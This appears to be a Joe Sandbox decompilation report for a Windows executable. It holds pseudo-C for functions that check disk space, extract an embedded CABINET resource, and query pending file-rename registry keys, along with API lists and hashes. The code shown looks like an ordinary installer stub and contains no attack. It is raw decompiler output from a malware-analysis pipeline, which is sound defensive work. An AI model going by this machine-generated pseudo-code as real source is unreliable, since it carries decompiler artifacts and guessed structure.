                                                                                                                                                                                                                                            control_flow_graph 324 10d597d-10d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10d59dd-10d5a1b GetDiskFreeSpaceA 324->325 326 10d59bb-10d59d8 call 10d44b9 call 10d6285 324->326 328 10d5ba1-10d5bde memset call 10d6285 GetLastError FormatMessageA 325->328 329 10d5a21-10d5a4a MulDiv 325->329 345 10d5c05-10d5c14 call 10d6ce0 326->345 337 10d5be3-10d5bfc call 10d44b9 SetCurrentDirectoryA 328->337 329->328 331 10d5a50-10d5a6c GetVolumeInformationA 329->331 334 10d5a6e-10d5ab0 memset call 10d6285 GetLastError FormatMessageA 331->334 335 10d5ab5-10d5aca SetCurrentDirectoryA 331->335 334->337 339 10d5acc-10d5ad1 335->339 351 10d5c02 337->351 343 10d5ad3-10d5ad8 339->343 344 10d5ae2-10d5ae4 339->344 343->344 347 10d5ada-10d5ae0 343->347 349 10d5ae7-10d5af8 344->349 350 10d5ae6 344->350 347->339 347->344 353 10d5af9-10d5afb 349->353 350->349 354 10d5c04 351->354 355 10d5afd-10d5b03 353->355 356 10d5b05-10d5b08 353->356 354->345 355->353 355->356 357 10d5b0a-10d5b1b call 10d44b9 356->357 358 10d5b20-10d5b27 356->358 357->351 359 10d5b29-10d5b33 358->359 360 10d5b52-10d5b5b 358->360 359->360 363 10d5b35-10d5b50 359->363 364 10d5b62-10d5b6d 360->364 363->364 365 10d5b6f-10d5b74 364->365 366 10d5b76-10d5b7d 364->366 367 10d5b85 365->367 368 10d5b7f-10d5b81 366->368 369 10d5b83 366->369 370 10d5b87-10d5b94 call 10d268b 367->370 371 10d5b96-10d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E010D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E010D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0x10d9a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0x10d9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0x10d9a38;
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0x10d9124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E010D268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = ( *0x10d9a38 >> 2) +  *0x10d9a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E010D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            0x010d5b05
                                                                                                                                                                                                                                            0x010d5b08
                                                                                                                                                                                                                                            0x010d5b20
                                                                                                                                                                                                                                            0x010d5b27
                                                                                                                                                                                                                                            0x010d5b52
                                                                                                                                                                                                                                            0x010d5b52
                                                                                                                                                                                                                                            0x010d5b5b
                                                                                                                                                                                                                                            0x010d5b62
                                                                                                                                                                                                                                            0x010d5b6b
                                                                                                                                                                                                                                            0x010d5b6d
                                                                                                                                                                                                                                            0x010d5b76
                                                                                                                                                                                                                                            0x010d5b7d
                                                                                                                                                                                                                                            0x010d5b83
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b6f
                                                                                                                                                                                                                                            0x010d5b72
                                                                                                                                                                                                                                            0x010d5b72
                                                                                                                                                                                                                                            0x010d5b85
                                                                                                                                                                                                                                            0x010d5b98
                                                                                                                                                                                                                                            0x010d5b9e
                                                                                                                                                                                                                                            0x010d5b87
                                                                                                                                                                                                                                            0x010d5b8f
                                                                                                                                                                                                                                            0x010d5b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b85
                                                                                                                                                                                                                                            0x010d5b29
                                                                                                                                                                                                                                            0x010d5b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b48
                                                                                                                                                                                                                                            0x010d5b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b4a
                                                                                                                                                                                                                                            0x010d5b0f
                                                                                                                                                                                                                                            0x010d5b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b16
                                                                                                                                                                                                                                            0x010d5a7c
                                                                                                                                                                                                                                            0x010d5a8a
                                                                                                                                                                                                                                            0x010d5aa5
                                                                                                                                                                                                                                            0x010d5aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d59bb
                                                                                                                                                                                                                                            0x010d59c0
                                                                                                                                                                                                                                            0x010d59c7
                                                                                                                                                                                                                                            0x010d59d1
                                                                                                                                                                                                                                            0x010d59d6
                                                                                                                                                                                                                                            0x010d5c05
                                                                                                                                                                                                                                            0x010d5c14
                                                                                                                                                                                                                                            0x010d5c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010D5A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 010D5A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010D5A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D5A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D5A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D5AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010D5BFC
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
                                                                                                                                                                                                                                            • Instruction ID: 972995698ae11c8b85963d0a212d0b371adb78dbc3f3408b2c2ecebaa2ec8cf3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4571A2B1A0131CAFEB269B68CC85BFA77BCEB48354F0440A9FD85D7144DA359E848F60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 374 10d4fe0-10d501a call 10d468f FindResourceA LoadResource LockResource 377 10d5161-10d5163 374->377 378 10d5020-10d5027 374->378 379 10d5029-10d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 10d5057-10d505e call 10d4efd 378->380 379->380 383 10d507c-10d50b4 380->383 384 10d5060-10d5077 call 10d44b9 380->384 389 10d50e8-10d5104 call 10d44b9 383->389 390 10d50b6-10d50da 383->390 388 10d5107-10d510e 384->388 392 10d511d-10d511f 388->392 393 10d5110-10d5117 FreeResource 388->393 401 10d5106 389->401 400 10d50dc 390->400 390->401 396 10d513a-10d5141 392->396 397 10d5121-10d5127 392->397 393->392 398 10d515f 396->398 399 10d5143-10d514a 396->399 397->396 402 10d5129-10d5135 call 10d44b9 397->402 398->377 399->398 403 10d514c-10d5159 SendMessageA 399->403 405 10d50e3-10d50e6 400->405 401->388 402->396 403->398 405->389 405->401
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E010D4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x10d9144 = E010D468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x10d9140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                                                                                                            					_t9 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            					if(_t9 != 0) {
                                                                                                                                                                                                                                            						ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            						ShowWindow(GetDlgItem( *0x10d8584, 0x841), 5); // executed
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t10 = E010D4EFD(0, 0); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						__imp__#20(E010D4CA0, E010D4CC0, E010D4980, E010D4A50, E010D4AD0, E010D4B60, E010D4BC0, 1, 0x10d9148, _t33);
                                                                                                                                                                                                                                            						_t34 = _t10;
                                                                                                                                                                                                                                            						if(_t34 == 0) {
                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                            							_t24 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            							E010D44B9(_t24,  *0x10d9148 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							_t37 = 0;
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							goto L10;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__imp__#22(_t34, "*MEMCAB", 0x10d1140, 0, E010D4CD0, 0, 0x10d9140); // executed
                                                                                                                                                                                                                                            						_t37 = _t10;
                                                                                                                                                                                                                                            						if(_t37 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            						if(_t10 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t27 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            						E010D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						_t12 =  *0x10d9140;
                                                                                                                                                                                                                                            						if(_t12 != 0) {
                                                                                                                                                                                                                                            							FreeResource(_t12);
                                                                                                                                                                                                                                            							 *0x10d9140 = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t37 == 0 &&  *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(( *0x10d8a38 & 0x00000001) == 0 && ( *0x10d9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            							SendMessageA( *0x10d8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						return _t37;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010D4FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 010D5006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 010D500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 010D5030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 010D5037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 010D504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 010D5051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(?,00000000,00000010,00000000), ref: 010D5111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010D5159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
                                                                                                                                                                                                                                            • Instruction ID: 3b12bff3ac5644cfe2af12a8984bee31e9dea1774172b812a3f7b647d7de8505
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53310A74741312BBE7305A7AEC89F673ABCA748755F044019FDC1E7589DABE8C408760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 462 10d256d-10d257d 463 10d2583-10d2589 462->463 464 10d2622-10d2627 call 10d24e0 462->464 466 10d25e8-10d2607 RegOpenKeyExA 463->466 467 10d258b 463->467 471 10d2629-10d262f 464->471 468 10d2609-10d2620 RegQueryInfoKeyA 466->468 469 10d25e3-10d25e6 466->469 467->471 472 10d2591-10d2595 467->472 473 10d25d1-10d25dd RegCloseKey 468->473 469->471 472->471 474 10d259b-10d25ba RegOpenKeyExA 472->474 473->469 474->469 475 10d25bc-10d25cb RegQueryValueExA 474->475 475->473
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E010D24E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,?,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25B2
